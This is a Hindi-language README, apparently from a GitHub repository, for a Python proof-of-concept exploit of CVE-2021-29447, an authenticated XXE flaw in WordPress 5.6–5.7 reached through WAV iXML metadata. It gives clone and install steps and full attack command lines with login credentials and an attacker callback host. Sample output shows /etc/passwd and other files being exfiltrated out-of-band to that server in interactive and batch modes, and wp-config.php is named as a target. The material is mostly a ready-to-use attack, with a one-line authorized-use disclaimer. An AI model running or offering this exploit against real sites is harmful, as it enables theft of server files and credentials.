
WordPress 5.6-5.7 (PHP 8+) प्रमाणित XXE इंजेक्शन का शोषण करने हेतु POC
वर्डप्रेस संस्करण 5.6–5.7 में प्रमाणित XXE कमजोरी (CVE-2021-29447) का WAV मेटाडेटा के माध्यम से शोषण करने के लिए एक Python PoC। यह WAV फाइलों में iXML चंक का दुरुपयोग करके संवेदनशील डेटा—जैसे /etc/passwd, wp-config.php, और अधिक—को सीधे आपकी dump/ निर्देशिका में आउट-ऑफ-बैंड (OOB) बहिर्वहन को ट्रिगर करता है।
यह स्क्रिप्ट एक XML एक्सटर्नल एंटिटी (XXE) दोष का लाभ उठाती है कि वर्डप्रेस WAV मेटाडेटा को कैसे पार्स करता है:
/etc/passwd) को पढ़ने और Base64-एन्कोड करने का निर्देश देता है।dump/ में लिखती है।-i): CTRL+C तक फ़ाइल पथों के लिए संकेत देता है—आकस्मिक अन्वेषण के लिए बढ़िया।-w <file>): सूची से दर्जनों फ़ाइल पथों को बैच प्रोसेस करता है।--no-http): बिल्ट-इन के बजाय अपने स्वयं के वेबसर्वर का उपयोग करें।--debug): विस्तृत HTTP और आंतरिक डिबग लॉग देखें।[CONFIG], [UPLOAD], [DUMP], [WARN], [ERROR]।git clone https://github.com/Tea-On/CVE-2021-29447-Authenticated-XXE-WordPress-5.6-5.7.git
cd CVE-2021-29447-Authenticated-XXE-WordPress-5.6-5.7
pip3 install requests
python3 exploit_CVE-2021-29447.py \
-H 10.10.14.8 -p 8080 \
-u admin -P p@ssw0rd \
-d http://vulnerable.local -i
[CONFIG] Interactive mode (CTRL+C to exit)
File> /etc/passwd
[CONFIG] DTD written: dtd/L2V0Yy9wYXNzd2Q=.dtd
[CONFIG] WAV built
[INFO] Nonce: d87f00a552
[DUMP] Dumped: dump/passwd
[UPLOAD] Upload ok (200)
[UPLOAD] URL: http://vulnerable.local/wp-content/uploads/payload.wav
File>
python3 exploit_CVE-2021-29447.py \
-H 10.10.14.8 -p 8080 \
-u admin -P p@ssw0rd \
-d http://vulnerable.local -w wordlist.txt
[CONFIG] Loaded 4 paths from "wordlist.txt"
[CONFIG] Using HTTP server at 10.10.14.8:8080
[CONFIG] Starting batch exfiltration...
[DUMP] [/etc/passwd] → dump/passwd
[WARN] No exfil for /etc/hostname within 6s, continuing
[UPLOAD] Upload ok (200)
[ERROR] Upload fail (502) on "/nonexistent"
python3 exploit_CVE-2021-29447.py \
-H 10.10.14.8 -p 8080 \
-u admin -P p@ssw0rd \
-d http://vulnerable.local --no-http --debug -w wordlist.txt
अपने स्वयं के HTTP सर्वर का उपयोग करके
dtd/को होस्ट करें और कॉलबैक कैप्चर करें। डिबग लॉग[DEBUG]के रूप में दिखाई देते हैं।
dtd/ – लक्ष्य को प्रस्तुत की गई उत्पन्न DTD फ़ाइलें।dump/ – डिकोड की गई फ़ाइल सामग्री, मूल पथ के नाम पर।EXFIL_TIMEOUT वेरिएबल (डिफ़ॉल्ट 6s) बदलें।--debug सक्षम करें।इस उपकरण का उपयोग केवल उन प्रणालियों पर करें जिनके आप मालिक हैं या जिनके परीक्षण की आपको स्पष्ट अनुमति है।
MIT License के तहत लाइसेंस प्राप्त। योगदान का स्वागत है—आइए हैकिंग को नैतिक और मजेदार बनाए रखें! ✨
| Argument | Required | Description |
|---|
-H, --host | ✅ | DTD प्रस्तुत करने और कॉलबैक प्राप्त करने के लिए स्थानीय होस्ट/IP |
-p, --port | ✅ | HTTP सर्वर के लिए स्थानीय पोर्ट |
-u, --user | ✅ | अपलोड अनुमतियों वाला वर्डप्रेस उपयोगकर्ता नाम |
-P, --pass | ✅ | वर्डप्रेस पासवर्ड |
-d, --domain | ✅ | लक्ष्य वर्डप्रेस URL (http:// शामिल करें) |
-w, --wordlist | ❌ | प्राप्त करने के लिए न्यूलाइन-सेपरेटेड पथों वाली फ़ाइल |
-i, --interactive | ❌ | इंटरैक्टिव रूप से फ़ाइल पथों के लिए संकेत दें |
--no-http | ❌ | बिल्ट-इन HTTP सर्वर शुरू करना छोड़ें |
--debug | ❌ | डिबग लॉग सक्षम करें (विस्तृत HTTP और आंतरिक विवरण) |